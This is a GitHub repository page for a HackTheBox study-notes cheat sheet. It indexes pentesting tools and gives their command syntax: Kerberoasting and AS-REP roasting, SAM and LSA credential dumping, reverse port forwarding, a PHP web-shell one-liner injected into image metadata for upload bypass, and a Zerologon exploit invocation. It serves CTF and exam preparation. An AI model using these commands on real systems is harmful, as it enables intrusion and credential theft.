cyberwr3nch / Hackthebox
Licence: mit
Notes Taken for HTB Machines & InfoSec Community.
Stars: ✭ 167
Programming Languages
python
Projects that are alternatives of or similar to Hackthebox
hackthebox
Notes Taken for HTB Machines & InfoSec Community.
Stars: ✭ 286 (+71.26%)
Mutual labels: guide, cheatsheet, infosec, star
Ios
Most usable tools for iOS penetration testing
Stars: ✭ 563 (+237.13%)
Mutual labels: cheatsheet, infosec, tools
Py2rs
A quick reference guide for the Pythonista in the process of becoming a Rustacean
Stars: ✭ 690 (+313.17%)
Mutual labels: cheatsheet, guide
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 870 (+420.96%)
Mutual labels: cheatsheet, infosec
Hacker Container
Container with all the list of useful tools/commands while hacking and pentesting Kubernetes Clusters
Stars: ✭ 105 (-37.13%)
Mutual labels: infosec, tools
Techinterview
💎 Cheat sheet to prep for technical interviews.
Stars: ✭ 454 (+171.86%)
Mutual labels: cheatsheet, guide
Github Serendipity.github.io
Quickly find popular open source projects: browse and find high quality repos quickly and elegantly, with trending, rank, awesome, topics, similar dimensions
Stars: ✭ 524 (+213.77%)
Mutual labels: guide, tools
Globbing
Introduction to "globbing" or glob matching, a programming concept that allows "filepath expansion" and matching using wildcards.
Stars: ✭ 86 (-48.5%)
Mutual labels: cheatsheet, guide
http-simple-cheatsheet
Simple HTTP status codes cheatsheet 🦄
Stars: ✭ 18 (-89.22%)
Mutual labels: guide, cheatsheet
Gitlab Watchman
Monitoring GitLab for sensitive data shared publicly
Stars: ✭ 127 (-23.95%)
Mutual labels: infosec, tools
Defaultcreds Cheat Sheet
One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
Stars: ✭ 1,949 (+1067.07%)
Mutual labels: cheatsheet, infosec
Kotlin Quick Guide
A quick guide to Kotlin for developers.
Stars: ✭ 127 (-23.95%)
Mutual labels: cheatsheet, guide
HOUDINI
Hundreds of Offensive and Useful Docker Images for Network Intrusion. The name says it all.
Stars: ✭ 791 (+373.65%)
Mutual labels: tools, cheatsheet
from-gms-to-hms
Complete guide to adding support for Huawei's mobile services and distribution platform into your apps that are already published on Google Play.
Stars: ✭ 30 (-82.04%)
Mutual labels: guide, cheatsheet
InfosecHouse
Infosec resource center for offensive and defensive security operations.
Stars: ✭ 61 (-63.47%)
Mutual labels: tools, infosec
Infosec Badges
Badges for your GitHub tool presented at InfoSec Conference
Stars: ✭ 74 (-55.69%)
Mutual labels: infosec, tools
git-cheatsheet
One stop guide to help solve all your doubts related to Git & GitHub.
Stars: ✭ 31 (-81.44%)
Mutual labels: cheatsheet, star
archcheatsheet
The way of creating custom Arch dual-boot system without desktop environment with `no mouse` approach in mind.
Stars: ✭ 83 (-50.3%)
Mutual labels: guide, cheatsheet
Pyspark Cheatsheet
🐍 Quick reference guide to common patterns & functions in PySpark.
Stars: ✭ 108 (-35.33%)
Mutual labels: cheatsheet, guide
hackthebox
Notes Taken for HTB Machine
Will be periodically updated, created with the intent of unwrapping all possible ways and to prep for exams
Yet More to be updated
created & maintained by: cyberwr3nch
Contents
Commands Reference
| File | Contents |
|---|---|
| Active Directory | Bruteforce SMB, WinRM Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcclient |
| Directory Enumeration | gobuster, rustbuster, wfuzz, vhosts |
| File Transfer | ftp, python, netcat, http, powershell curling, metasploit, smb, net use, impacket |
| Nmap | Nmap, Port Scanning, Tags |
| Notes | DNS Recon, 302 Redirects, Burpsuite, MySQL, Passwd File, Port Forwarding |
| Password Cracking | hashcat, john, hash examples, zip file cracking |
| Post Exploitation | current user, network info, locate, Antivirus Disabling, registry, privileges, running processes, plink, stored credentials, wmic |
| Regular Commands | ls, Grep, AWK, Curl, wget, Compression and decompression of files, Find, xclip, Misc, bash loops, sed, tr, tail, watch |
| Reverse Shells | Bash TCP, Bash UDP, Netcat, Telnet, Socat, Perl, Python, PHP, Ruby, SSL, Powershell, AWK, TCLsh, Java, LUA, MSF Reverse Shells (war, exe, elf, macho, aspx, jsp, python, sh, perl), Xterm, Magic bytes, Exiftool, Simple PHP one-liners |
| Web Attacks | sql-injection, login bruteforce (wfuzz, hydra) |
| Docker Commands | installation, building, pulling, updating, deleting, listing, cheatsheet |
| Git Commands | clone, commit, push, pull, add, log, deleted file, checkout |
| Pivoting | POST Exploitation, Pivoting, Chisel |
Tools
Windows and Active Directory
| Tool | Use | Command Syntax |
|---|---|---|
| Bloodhound.py | BloodHound written in Python. Used to obtain AD information from a Windows machine | `python3 bloodhound-python -u <username> -p <passphrase> -ns <machineIP> -d <domainname> -c all` |
| Impacket | Swiss Army knife for most Windows AD attacks | `python GetNPUsers.py <domain_name>/ -usersfile <users_file>` = ASREPRoasting; `python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password>` = Kerberoasting |
| Kerbrute | A tool written in Go to enumerate AD users | `./kerbrute userenum --dc <machine ip> -d <domainname> <users_file>` |
| CredDump | Used to obtain cached credentials, LSA secrets and password hashes when the SYSTEM and SAM hives are available | `./pwdump.py <system hive> <sam hive>` = obtain password hashes; `./cachedump.py <system hive> <sam hive>` = obtain cached credentials; `./lsadump.py <system hive> <sam hive>` = obtain LSA secrets |
| PwdDump | After getting administrative access, running this dumps the password hashes | `.\PwDump7.exe` |
| ApacheDirectoryStudio | LDAP browser used to analyze an LDAP instance running on Linux (creds required); here the LDAP service running on the victim machine is forwarded and accessed from the attacker machine | `sudo ssh -L 389:172.20.0.10:389 [email protected]` |
Port Forwarding
| Tool | Use | Command Syntax |
|---|---|---|
| Chisel | Used to forward a service running on a port of the victim machine | `./chisel server -p <port no.> --reverse` = on the attacker machine; `./chisel client <attackerip:port> R:1234:127.0.0.1:1121` = forwards the service running on port 1121 of the victim to port 1234 on the attacker machine |
| socat | Swiss Army knife for port forwarding | `socat TCP-LISTEN:8000,fork TCP:<machineIP>:<port>` = listens for every connection on port 8000 and forwards it to machineIP and its port; `socat TCP-LISTEN:9002,bind=<specific ip>,fork,reuseaddr TCP:localhost:<port>` = forwards all incoming requests on port 9002 to the localhost port; reuseaddr tells socat to use the address (e.g. localhost) even if it is in use by other services |
| plink | PuTTY SSH in CLI mode | `.\plink.exe <[email protected]> -R <remote port>:<localhost>:<local port>`; `.\plink.exe [email protected] -R 8888:127.0.0.1:8888` = forwards the service running on the victim machine's port 8888 to the attacker machine's port 8888 |
| ssh | Uses the built-in ssh client to port forward a service | Remote port forwarding (the command is entered on the compromised machine): `ssh <[email protected] -R 192.168.XX.XX:3000:127.0.0.1:80 -N -f` = opens port 3000 on cyberwr3nch's machine and forwards the service running on port 80 to it, so visiting 127.0.0.1:3000 in cyberwr3nch's browser is the same as visiting 127.0.0.1:80 on the victim machine |
Directory Enumeration
| Tool | Use | Command Syntax |
|---|---|---|
| DirSearch | Directory enumeration tool | `python3 dirsearch.py -u <url> -e <extn>` |
| Gobuster | Directory enumeration tool written in Go | `gobuster dir -u <url> -w <wordlist> -x <extn> -b <hide status code> -t <threads>` |
| RustBuster | Directory enumeration tool written in Rust | `rustbuster dir -u <url> -w <wordlist> -e <extn>` |
Post Exploitation
| Tool | Use | Command Syntax |
|---|---|---|
| LinEnum | Post-exploitation script that automates enumeration | `./LinEnum.sh` |
| LinPeas | Post-exploitation enumeration script | `./linpeas.sh` |
| WinPEASbat/WinPEASexe | Windows post-exploitation enumeration script and exe | `.\winPEAS.bat` |
Misc
| Tool | Use | Command Syntax |
|---|---|---|
| Exiftool | Inspects the metadata of an image; injects a PHP payload into the comment section for file upload vulns, which can be uploaded as a double extension file.php.ext | `./exiftool -Comment='<?php system($_GET['cmd']); ?>' <image.ext>` |
| Git Dumper | Dumps the Git repo if a .git directory is found on a website | `./git-dumper.py <website/.git> <output folder>` |
| lxd-alpine builder | When the victim machine runs lxc, privesc is done with this | article here |
| Php-reverse-shell | PHP reverse shell; when an upload is possible, change the IP and make a request to obtain a reverse shell | |
| ZerologonPOC | CVE-2020-1472 exploit; sets the domain admin password to empty and dumps the secrets. PS: the latest version of Impacket is required | `python3 set_empty_pw.py machinename/domainname machine IP; secretsdump.py -just-dc -no-pass machinename\[email protected]` |
| Gopherus | SSRF with the gopher:// protocol | `gopherus --exploit phpmemcache` |
SAY NO TO MSF !
Admired Bloggers
These are the URLs that have writeups for active and retired machines
- snowscan's Blog ⭐️
- xct's Blog ⭐️
- My Blog 💀 (inactive for a period of time)
- nav1n
- 0xPrashanth
- BinaryBiceps
- p0i5on8
- lUc1f3r11's Blog
- subham399
- Jacob Riggs
- elbee infoSec
- Kali-education
- roman.de
- 0xdf's Blog
- 0xrick's Blog
- SecJuice
- Sector 035 OSINT ⭐️
nvm this
Constantly updating from MAY 3rd 2020
Thanks for visiting
A noob cyberwr3nch🔧
A member of TCSC
Learn and Spread <3
xoxo💙
Support My contents